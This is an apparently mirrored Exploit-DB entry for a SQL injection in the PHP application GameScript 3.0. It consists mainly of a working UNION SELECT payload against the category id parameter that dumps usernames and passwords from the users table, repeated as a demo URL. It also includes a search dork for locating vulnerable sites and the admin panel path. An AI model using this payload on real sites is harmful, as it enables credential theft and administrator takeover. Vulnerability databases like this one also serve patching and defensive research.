GameScript 3.0 – SQL Injection

• Exploit Database
• 17 阅读

• 作者： FormatXformat
  日期： 2010-02-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11577/

• Author :FormatXformat
  Home : Tkurd.net
  
  Script : http://www.gamescript.net
  Vulnerabilities : SQL Injection
  
  
  Dork:
  
  Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.
  
  
  
  Exploit:
  
  /index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
  
  Admin page: admincp
  
  
  
  Demo :
  
  http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--